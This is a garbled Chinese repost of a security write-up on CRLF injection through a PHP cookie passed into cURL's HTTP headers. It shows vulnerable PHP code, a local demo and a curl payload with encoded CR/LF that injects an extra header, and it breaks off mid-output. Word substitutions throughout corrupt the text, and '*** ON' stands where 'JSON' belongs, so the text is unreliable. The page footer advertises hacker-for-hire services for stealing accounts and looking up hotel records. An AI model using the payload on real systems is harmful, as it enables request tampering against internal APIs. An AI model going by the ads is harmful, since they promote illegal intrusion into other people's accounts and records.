将CRLF注入到PHP的cURL选项中
这是一篇关于将回车符和换行符注入调用内部 API的帖子。一年前我在GitHub上写了这篇文章的关键,但GitHub不是特别合适发布博客文章。你现在所看到的这 篇文章我添加了更多细节,所以它不是是直接复制粘贴的。
我喜爱做白盒测验。我不是一个优异的黑盒测验人员,但我花了十多年的时刻阅览和写PHP代码 – 而且在此过程中犯了许多过错 – 所以我知道要留意些什么。
我阅读了一些源代码发现了一个和这个有点像的函数:
// common.php
function getTrialGroups(){
$trialGroups = 'default';
if (isset($_COOKIE['trialGroups'])){
$trialGroups = $_COOKIE['trialGroups'];
}
return explode(",", $trialGroups);
}
我所看到的体系都有一个“Trial Groups”的概念。 每个用户会话都有一个与之相关的组,在cookie中以逗号分隔的列表存储。 我的主意是,当推出新功用时,能够首先为少量客户启用这些功用,以下降功用发动的危险,或许答应对特性的不同变体进行比较(这种办法称为A /B测验)。 getTrialGroups()函数仅仅读取cookie值,将列表拆开并为用户回来一组 trial groups。
此功用中短少白名单当即引起了我的留意。 我查找了其余部分的代码库来找调用函数的详细位置,这样我就能够看到对其回来值是否有任何不安全的运用。
我不能和你们共享详细的代码,但我把我的发现大致的写了下来:
// server.php
// Include common functions
require __DIR__.'/common.php';
// Using the awesome httpbin.org here to just reflect
// our whole request back at us as *** ON ?
$ch = curl_init("http://httpbin.org/post");
// Make curl_exec return the response body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Set the content type and pass through any trial groups
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Content-Type: application/json",
"X-Trial-Groups: " . implode(",", getTrialGroups())
]);
// Call the 'getPublicData' RPC method on the internal API
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
"method" => "getPublicData",
"params" => []
]));
// Return the response to the user
echo curl_exec($ch);
curl_close($ch);
此代码运用cURL库在内部 *** ON API上调用getPublicData办法。 该API需求了解用户的trial groups,以便相应地更改其行为,所以trial groups 会在X-Trial-Groups标头中传递给API。
问题是,在设置CURLOPT_HTTPHEADER时不会查看回车符或换行符字符的值。 由于getTrialGroups()函数回来用户可控数据,因而能够将恣意头部注入到API恳求中。
演示
为了让咱们更简单的了解,我将运用PHP的内置Web服务器在本地运转server.php:
tom@slim:~/tmp/crlf php -S localhost:1234 server.php
PHP 7.2.7-0ubuntu0.18.04.2 Development Server started at Sun Jul 29 14:15:14 2019
Listening on http://localhost:1234
Document root is /home/tom/tmp/crlf
Press Ctrl-C to quit.
运用cURL命令行实用程序,咱们能够发送包括trialGroups cookie的示例恳求:
tom@slim:~ curl -s localhost:1234 -b 'trialGroups=A1,B2'
{
"args": {},
"data": "{"method":"getPublicData","params":[]}",
"files": {},
"form": {},
"headers": {
"Accept": "*/*",
"Connection": "close",
"Content-Length": "38",
"Content-Type": "application/json",
"Host": "httpbin.org",
"X-Trial-Groups": "A1,B2"
},
"json": {
"method": "getPublicData",
"params": []
},
"origin": "X.X.X.X",
"url": "http://httpbin.org/post"
}
我运用http://httpbin.org/post替代内部API端点,它回来一个 *** ON文档,描述发送的POST恳求,文档中包括恳求中的一切POST数据和标头。
有关呼应一个需求向咱们提一下的事项是发送到httpbin.org的X-Trial-Groups标头包括trialGroups cookie中的A1,B2字符串。 然后现在试一下一些CRLF(回车换行)注入:
tom@slim:~ curl -s localhost:1234 -b 'trialGroups=A1,B2%0d%0aX-Injected:%20true'
{
"args": {},
"data": "{"method":"getPublicData","params":[]}",
"files": {},
"form": {},
"headers": {
"Accept": "*/*",
"Connection": "close",
"Content-Length": "38",
"Content-Type": "application/json",
[1] [2] [3] 黑客接单网
相关文章
qq空间技术网,怎么找黑客黑别人QQ,怎么在qq上找黑客盗号
/// <param name="sql"></param>图6 引进进犯代码这个API:api.spreaker.com/crossdomain.xml也存在缝隙,所以我一起...
黑客在线接单查开房记录,上哪儿找黑客,闲鱼上面怎么找黑客
@Override用’or’='or’来登陆由于咱们现已清晰112ms是一次跳频序列的循环,那么从冗余数据中咱们能够推论: $this->db->query("DELETE FROM "....
那有黑客接单平台,国内信誉黑客联系方式,淘宝找黑客改成绩
研究者在黎巴嫩发现了很多的受害者,但他们在以色列、土耳其、英国、日本、美国和其它国家也都找到了被侵略的组织。 哈哈,00切断成功了。 文中提及的部分技能、东西或许带有必定攻击性,仅供安全学习和教育...
网络信息处理_找部从小就是黑客高手的电影-黑客接单平台
这将在咱们的主机上放一个名为“evil”的Powershell脚本,该脚本将在运转上一图画所示指令的受害核算机上履行:[1][2][3]黑客接单渠道linux:echo -e “<?@inclu...
黑客能帮人找回钱吗
④ SpoolService的bug导致Exchange服务器回连到ntlmrelayx.py,即将认证信息发送到ntlmrelayx.py。 可以在下图中看到认证用户是TESTTOPSEC$。 W...
一些你不知道到Cookie安全登录防备
作为一个web开发者,避免不了用户登录功用,但是有多少知道用户登录的一些安全防备技能呢? 一般的菜鸟只知道把用户信息保存到Cookie 即可,登录只管判别Cookie是否存在,凭借着cookie值...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!